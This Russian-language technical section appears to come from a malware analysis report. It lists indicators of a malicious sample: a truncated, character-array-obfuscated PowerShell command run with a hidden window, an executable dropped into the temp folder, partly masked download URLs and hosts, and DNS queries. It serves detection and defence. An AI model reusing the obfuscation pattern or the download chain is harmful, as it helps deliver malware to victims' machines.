Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $PsHome[21]+$psHomE[34]+'x') ( [sTrInG]::jOIn('', ( [ChAR[]]( 96, 40,38, 47 ,121 , 42,33 , 51 , 105,43 ,38, 46, 33, 39 ,48, 100, 10,33 ,48 ,106, 19 ,33, 38 , 7 ,40 ,45, 33 , 42,48,127,96 , 5...
- %TEMP%\395.exe
- %TEMP%\395.exe
- 'sa###nmedia.com':80
- 'fe#######msinternational.com':80
- 'fe#######msinternational.com':443
- 'me##ena.com':80
- 'me##ena.com':443
- http://www.sa###nmedia.com/6gOwBc/
- http://www.fe#######msinternational.com/mqf69/
- http://www.me##ena.com/MfXlN/
- 'fe#######msinternational.com':443
- 'me##ena.com':443
- DNS ASK ma####sunano.com
- DNS ASK sa###nmedia.com
- DNS ASK fe#######msinternational.com
- DNS ASK pe#####kan.unwiku.ac.id
- DNS ASK me##ena.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $PsHome[21]+$psHomE[34]+'x') ( [sTrInG]::jOIn('', ( [ChAR[]]( 96, 40,38, 47 ,121 , 42,33 , 51 , 105,43 ,38, 46, 33, 39 ,48, 100, 10,33 ,48 ,106, 19 ,33, 38 , 7 ,40 ,45, 33 , 42,48,127,96 , 5...' (со скрытым окном)